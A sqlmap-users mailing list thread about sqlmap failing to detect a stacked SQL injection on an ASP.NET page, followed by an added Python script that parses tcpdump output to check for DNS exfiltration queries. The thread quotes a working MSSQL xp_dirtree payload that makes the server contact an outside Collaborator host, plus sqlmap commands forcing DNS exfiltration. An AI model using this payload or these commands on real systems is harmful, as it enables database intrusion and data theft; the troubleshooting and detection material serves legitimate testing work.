> On Dec 19, 2016, at 5:10 PM, Mark M. <vv...@hotmail.com> wrote:
> 
> Right, that makes sense.  But at the same time, this is a valid injection (I 
> can reproduce it manually).  Perhaps there's information I can provide to 
> someone that would help improve the tool so it would catch this particular 
> case and others like it?

Why not run sqlmap through Burp Suite (--proxy) and manually look at the 
requests it is making to figure out what the differences are in the request you 
can make work and the ones sqlmap is trying. Maybe you need a tamper script or 
something needs to be massaged that Burp was able to do without intervention.

> 
> 
> On Dec 19, 2016, at 5:04 PM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
> 
>> As said, there should be at least one other SQLi technique available. In 
>> your case there is NONE. sqlmap will not blindly use dns-exfil if at least 
>> one other technique worked.
>> 
>> Bye
>> 
>> On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@hotmail.com> wrote:
>> Thanks, that's good advice.  And I probably should post a little more detail 
>> on what I'm running here so others can see it as well.
>> 
>> 
>> Here's the command executing:
>> 
>> 
>> 
>> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1
>>         ___
>>        __H__
>>  ___ ___[.]_____ ___ ___  {1.0.12#stable}
>> |_ -| . [)]     | .'| . |
>> |___|_  [']_|_|_|__,|  _|
>>       |_|V          |_|   http://sqlmap.org
>> 
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior 
>> mutual consent is illegal. It is the end user's responsibility to obey all 
>> applicable local, state and federal laws. Developers assume no liability and 
>> are not responsible for any misuse or damage caused by this program
>> 
>> [*] starting at 16:56:14
>> 
>> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
>> [16:56:14] [INFO] setting up DNS server instance
>> custom injection marking character ('*') found in option 
>> '--headers/--user-agent/--referer/--cookie'. Do you want to process it? 
>> [Y/n/q] n
>> [16:56:16] [INFO] testing connection to the target URL
>> [16:56:18] [INFO] testing if the target URL is stable
>> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page 
>> comparison on a sequence matcher. If no dynamic nor injectable parameters 
>> are detected, or in case of junk results, refer to user's manual paragraph 
>> 'Page comparison' and provide a string or regular expression to match on
>> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
>> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter 
>> 'ProductCategory' might not be injectable
>> [16:56:23] [INFO] testing for SQL injection on GET parameter 
>> 'ProductCategory'
>> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - 
>> WHERE or HAVING clause (IN)'
>> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
>> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries 
>> (comment)'
>> [16:56:39] [WARNING] time-based comparison requires larger statistical 
>> model, please wait......... (done)
>> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
>> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be 
>> injectable
>> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable. Try 
>> to increase '--level'/'--risk' values to perform more tests. Also, you can 
>> try to rerun by providing either a valid value for option '--string' (or 
>> '--regexp'). If you suspect that there is some kind of protection mechanism 
>> involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. 
>> '--tamper=space2comment')
>> [16:58:03] [WARNING] HTTP error codes detected during run:
>> 500 (Internal Server Error) - 98 times
>> 
>> [*] shutting down at 16:58:03
>> 
>> 
>> 
>> And then, my capture results for DNS traffic:
>> 
>> 
>> 
>> root@bass:~# tcpdump -n -i eth0 udp port 53
>> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
>> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
>> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)
>> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org. (30)
>> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)
>> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
>> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? www.testsite.org. (30)
>> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? www.testsite.org. (30)
>> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A 173.213.231.200 (46)
>> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
>> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? www.testsite.org. (30)
>> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA? www.testsite.org. (30)
>> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A 173.213.231.200 (46)
>> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? www.testsite.org. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? www.testsite.org. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A 173.213.231.200 (46)
>> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
>> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? www.testsite.org. (30)
>> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA? www.testsite.org. (30)
>> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A 173.213.231.200 (46)
>> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>> 
>> 
>> It doesn't seem like an injection pattern is being tried that is getting the 
>> DNS exfiltration to occur... or else I'm doing something else wrong.
>> 
>> Thanks,
>> 
>> V
>> 
>> From: Miroslav Stampar <miroslav.stam...@gmail.com>
>> Sent: Monday, December 19, 2016 4:10 PM
>> To: Mark M.
>> Cc: sqlmap-users@lists.sourceforge.net
>> Subject: Re: [sqlmap-users] Sqlmap/DNS exfil
>>  
>> I would suggest you run Wireshark or similar when running with 
>> --dns-domain to properly debug what is going on. There could be really lots 
>> of problems before you fine tune it (e.g. other service running on :53).
>> 
>> About "forcing" sqlmap to use dns-exfil: it will always at least try 
>> to test it at the start of a run (if another injection technique is available). 
>> Also, it will prefer other "faster" techniques (ERROR and UNION) over 
>> dns-exfil. However, there is a hidden switch "--force-dns" which will force 
>> the usage of dns-exfil even if ERROR/UNION are available.
>> 
>> As said, the best advice I can give you is to run Wireshark during 
>> the run and really see what is going on.
>> 
>> Bye
>> 
>> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@hotmail.com> wrote:
>> I have a situation where Burp has detected the following DNS exfiltration 
>> injection for a query parameter in a web app:
>> 
>> 
>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>> 
>> 
>> 
>> To make that a little easier to read, the injected value is:
>> 
>> 
>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--
>> 
>> 
>> I've modified the domain and verified that I receive the DNS requests on my 
>> local DNS server (the domain which I provide to sqlmap using the 
>> --dns-domain=xxx option) when the injection is manually sent to the page.  
>> The problem is, when I pass the request to sqlmap it's not detecting that 
>> there's an injection at all.  I've provided the OS/DBMS and --level 5, but 
>> still no dice.  I'm using sqlmap v1.0.12#stable.
>> 
>> 
>> Since I've gotten many other injections to work in the past, I believe that 
>> I'm using sqlmap properly (formatting my request in a file appropriately, 
>> specifying the correct parameter to test, etc.)  However, it surprised me 
>> that what appeared to be a fairly straight-forward stacked SQL injection 
>> would slip by all of sqlmap's tests. Is there a way to force sqlmap to try 
>> DNS exfiltration injections despite no other injection technique succeeding?
>> 
>> 
>> Thanks
>> 
>> V
>> 
>> 
>> 
>> ------------------------------------------------------------------------------
>> Developer Access Program for Intel Xeon Phi Processors
>> Access to Intel Xeon Phi processor-based developer platforms.
>> With one year of Intel Parallel Studio XE.
>> Training and support from Colfax.
>> Order your platform today. http://sdm.link/intel
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> 
>> 
>> 
>> 
>> -- 
>> Miroslav Stampar
>> http://about.me/stamparm
>> 
>> 
>> -- 
>> Miroslav Stampar
>> http://about.me/stamparm
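As an added illustration (not code from this thread or from sqlmap), here is a small Python check that does what Miroslav recommends: parse a tcpdump capture of port-53 traffic and report whether any lookups reached the listener domain at all, and whether any of them carry the long encoded labels that DNS-based exfiltration produces. The listener domain dns.lanternsec.com is taken from the command quoted above. The capture lines are constructed: the first three copy the format of the capture quoted above (plain A/AAAA lookups of the target host), the last two are invented with RFC 5737 addresses to show what a hit would look like. The 20-character label threshold is an assumption. Run against the real capture above, the check reports zero queries under the listener domain, which matches V's observation that no DNS-based payload was ever sent.

```python
import re
import sys
from collections import Counter

# Matches the query lines tcpdump prints with "-n" for UDP/53 traffic
# (the format seen in the capture above). Response lines have no "?" after
# the record type and are skipped.
QUERY_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.53: (?P<id>\d+)\+? (?P<qtype>[A-Z]+)\? (?P<name>\S+)\. \(\d+\)$"
)

# Constructed sample capture. Lines 1-3 mirror the capture quoted in the thread;
# lines 4-5 are made up (RFC 5737 addresses) to show queries under the listener
# domain: one with a long encoded label, one bare lookup of the domain itself.
SAMPLE_CAPTURE = [
    "16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)",
    "16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org. (30)",
    "16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)",
    "16:56:20.100000 IP 203.0.113.7.51234 > 198.51.100.5.53: 4111+ A? "
    "c0ffee.a1b2c3d4e5f60718293a4b5c6d7e8f90.dns.lanternsec.com. (78)",
    "16:56:21.200000 IP 203.0.113.7.51235 > 198.51.100.5.53: 4112+ A? dns.lanternsec.com. (36)",
]

# The --dns-domain value from the sqlmap command quoted above.
LISTENER_DOMAIN = "dns.lanternsec.com"


def parse_queries(lines):
    """Yield (timestamp, qtype, lowercased name) for every DNS query line."""
    for line in lines:
        m = QUERY_RE.match(line.strip())
        if m:
            yield m.group("ts"), m.group("qtype"), m.group("name").lower()


def is_exfil_like(name, domain, min_label_len=20):
    """Heuristic (assumed threshold): the name sits under `domain` and at least
    one of the labels in front of it is long enough to be carrying data."""
    suffix = "." + domain.lower()
    if not name.endswith(suffix):
        return False
    labels = name[: -len(suffix)].split(".")
    return any(len(label) >= min_label_len for label in labels)


def summarize(lines, domain):
    """Count queries under `domain`, how many look like exfil, and what else was looked up."""
    domain = domain.lower()
    under_domain = []
    other = Counter()
    for ts, qtype, name in parse_queries(lines):
        if name == domain or name.endswith("." + domain):
            under_domain.append((ts, name, is_exfil_like(name, domain)))
        else:
            other[name] += 1
    return {
        "domain_queries": len(under_domain),
        "exfil_like": sum(1 for _, _, flagged in under_domain if flagged),
        "other_names": dict(other),
    }


def run_sample():
    """Summary for the constructed capture above."""
    return summarize(SAMPLE_CAPTURE, LISTENER_DOMAIN)


if __name__ == "__main__":
    # Reads a capture from stdin when piped, otherwise uses the constructed sample.
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_CAPTURE
    print(summarize(source, LISTENER_DOMAIN))
```

To use it on a live run, feed it the capture directly, e.g. `tcpdump -n -l -i eth0 udp port 53 | python3 dnscheck.py`; if `domain_queries` stays at zero for the whole sqlmap run, the DNS-based payload was never sent, which is the case the thread describes, and the place to look is sqlmap's technique selection rather than the DNS listener.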
